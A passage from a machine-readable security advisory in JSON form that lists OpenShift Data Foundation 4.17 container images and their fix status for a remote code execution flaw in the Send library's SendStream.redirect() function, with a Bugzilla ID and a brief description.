"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
